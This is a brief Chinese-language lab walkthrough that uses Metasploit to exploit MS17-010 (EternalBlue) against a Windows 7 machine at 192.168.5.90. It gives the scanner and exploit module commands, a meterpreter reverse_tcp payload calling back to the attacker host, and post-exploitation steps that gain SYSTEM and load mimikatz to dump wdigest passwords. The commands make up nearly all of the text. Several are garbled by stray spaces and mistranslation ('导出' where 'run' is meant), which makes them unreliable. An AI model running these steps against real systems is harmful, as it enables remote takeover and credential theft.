测试环境
靶机: Windows7 IP:192.168.5.90开放445端口封闭防火墙
攻击机: Windows10/kali IP:192.168.5.42
1、检查漏洞模块
search ms17-010
2、使用扫描模块扫描是否存在永久的蓝洞
use auxiliary/scanner/SMB/SMB _ ms17 _ 010
set rhosts 192.168.5.90
set threads 1
导出
可知存在该漏洞
3、攻击模块的使用
use exploit/windows/SMB/ms17 _ 010 _ eternal blue
setpayloadwindows/x64/meter preter/reverse _ TCP
set lhost 192.168.5.42
set rhosts 192.168.5.90
set rport 445
导出
getuid捕获系统权限的桌面
load mimkatz运行wdigest以获取密码
还有很多其他功能。